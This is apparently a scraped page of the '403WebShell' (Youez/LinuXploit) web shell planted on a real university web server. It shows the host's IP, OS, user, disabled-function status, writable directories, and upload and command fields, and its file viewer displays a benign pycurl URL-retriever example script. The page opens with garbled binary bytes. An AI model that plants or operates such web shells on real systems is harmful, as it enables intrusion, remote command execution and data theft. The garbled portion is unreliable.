h(  ) ($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms����Sb�,;R''6c2I�!\����kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K����x)1�6@r*2�89ma��&��'ti������{~#������t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1����w�r��l&-t*3�<<�u��#����j&.u��J68\8?"#$%&'()*+,-./0 ! 
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell
403Webshell
Server IP : 10.254.12.21  /  Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/doc/python-pycurl-7.19.0/examples/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/share/doc/python-pycurl-7.19.0/examples/retriever.py
#! /usr/bin/env python
# -*- coding: iso-8859-1 -*-
# vi:ts=4:et
# $Id: retriever.py,v 1.19 2005/07/28 11:04:13 mfx Exp $

#
# Usage: python retriever.py <file with URLs to fetch> [<# of
#          concurrent connections>]
#

import sys, threading, Queue
import pycurl

# We should ignore SIGPIPE when using pycurl.NOSIGNAL - see
# the libcurl tutorial for more info.
try:
    import signal
    from signal import SIGPIPE, SIG_IGN
    signal.signal(signal.SIGPIPE, signal.SIG_IGN)
except ImportError:
    pass


# Get args
num_conn = 10
try:
    if sys.argv[1] == "-":
        urls = sys.stdin.readlines()
    else:
        urls = open(sys.argv[1]).readlines()
    if len(sys.argv) >= 3:
        num_conn = int(sys.argv[2])
except:
    print "Usage: %s <file with URLs to fetch> [<# of concurrent connections>]" % sys.argv[0]
    raise SystemExit


# Make a queue with (url, filename) tuples
queue = Queue.Queue()
for url in urls:
    url = url.strip()
    if not url or url[0] == "#":
        continue
    filename = "doc_%03d.dat" % (len(queue.queue) + 1)
    queue.put((url, filename))


# Check args
assert queue.queue, "no URLs given"
num_urls = len(queue.queue)
num_conn = min(num_conn, num_urls)
assert 1 <= num_conn <= 10000, "invalid number of concurrent connections"
print "PycURL %s (compiled against 0x%x)" % (pycurl.version, pycurl.COMPILE_LIBCURL_VERSION_NUM)
print "----- Getting", num_urls, "URLs using", num_conn, "connections -----"


class WorkerThread(threading.Thread):
    def __init__(self, queue):
        threading.Thread.__init__(self)
        self.queue = queue

    def run(self):
        while 1:
            try:
                url, filename = self.queue.get_nowait()
            except Queue.Empty:
                raise SystemExit
            fp = open(filename, "wb")
            curl = pycurl.Curl()
            curl.setopt(pycurl.URL, url)
            curl.setopt(pycurl.FOLLOWLOCATION, 1)
            curl.setopt(pycurl.MAXREDIRS, 5)
            curl.setopt(pycurl.CONNECTTIMEOUT, 30)
            curl.setopt(pycurl.TIMEOUT, 300)
            curl.setopt(pycurl.NOSIGNAL, 1)
            curl.setopt(pycurl.WRITEDATA, fp)
            try:
                curl.perform()
            except:
                import traceback
                traceback.print_exc(file=sys.stderr)
                sys.stderr.flush()
            curl.close()
            fp.close()
            sys.stdout.write(".")
            sys.stdout.flush()


# Start a bunch of threads
threads = []
for dummy in range(num_conn):
    t = WorkerThread(queue)
    t.start()
    threads.append(t)


# Wait for all threads to finish
for thread in threads:
    thread.join()

Youez - 2016 - github.com/yon3zu
LinuXploit